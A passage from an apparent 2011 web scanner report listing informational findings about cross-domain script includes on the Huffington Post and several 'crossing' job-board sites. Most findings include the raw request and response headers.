   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295646638&extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1295646638&extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

15.359. http://www.huffingtonpost.com/2011/01/19/craziest-ways-to-pay-tuit_n_811038.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/01/19/craziest-ways-to-pay-tuit_n_811038.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter.js&1295646638
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js%2Cslideshow%2Fpollajax.js&1295646638&extra3
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295646638&extra6

Request

GET /2011/01/19/craziest-ways-to-pay-tuit_n_811038.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 325663
Content-Type: text/html; charset=utf-8
Expires: Fri, 21 Jan 2011 22:28:23 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Fri, 21 Jan 2011 22:28:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295646638&extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js%2Cslideshow%2Fpollajax.js&1295646638&extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter.js&1295646638"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

15.360. http://www.hvaccrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hvaccrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112628

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.361. http://www.informationtechnologycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.informationtechnologycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:43 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133954

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.362. http://www.insurcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insurcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127189

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.363. http://www.intellectualpropertycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellectualpropertycrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.364. http://www.internshipcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.internshipcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.365. http://www.j2eecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.j2eecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111694

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.366. http://www.journalismcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.journalismcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111259

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.367. http://www.lawcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js
http://www.jdjournal.com/script/ajax.js
http://www.jdjournal.com/script/functions.js
http://www.statcounter.com/counter/frames.js
https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES

Request

Response

15.368. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/article/6070/Brooklyn-Law-School/

Issue detail

The response dynamically includes the following scripts from other domains:

http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.jdjournal.com/script/ajax.js
http://www.jdjournal.com/script/functions.js
http://www.statcounter.com/counter/frames.js
